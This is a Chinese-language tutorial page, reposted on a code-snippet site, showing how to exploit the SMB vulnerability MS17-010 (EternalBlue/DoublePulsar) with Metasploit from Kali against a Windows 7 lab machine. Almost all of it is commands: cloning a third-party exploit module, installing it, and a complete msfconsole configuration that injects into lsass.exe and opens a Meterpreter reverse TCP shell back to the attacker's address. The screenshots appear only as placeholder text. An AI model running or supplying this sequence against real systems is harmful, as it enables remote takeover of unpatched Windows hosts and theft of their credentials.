首页 > 代码库 > smb(ms17-010)远程命令执行之msf

smb(ms17-010)远程命令执行之msf

2024-09-19 06:17:59   206人阅读

本次用到的环境:

kali(2016.2)32位系统.ip地址:192.168.1.104

目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

具体的步骤如下:

kali系统下安装wine32:

apt-get install wine32

 技术分享

 

用wine32执行cmd.exe

wine cmd.exe

 技术分享

exit        //退出

 技术分享

 git  clone下载其利用脚本:

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

 技术分享

技术分享

启动msf,然后进行一系列设置:

service postgresql start

msfconsole

 技术分享

 

search  eternalblue

use  exploit/windows/smb/eternalblue_doublepulsar

技术分享

 

 set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit

 技术分享

技术分享

技术分享

 技术分享

 

 

 

 

smb(ms17-010)远程命令执行之msf


联系
我们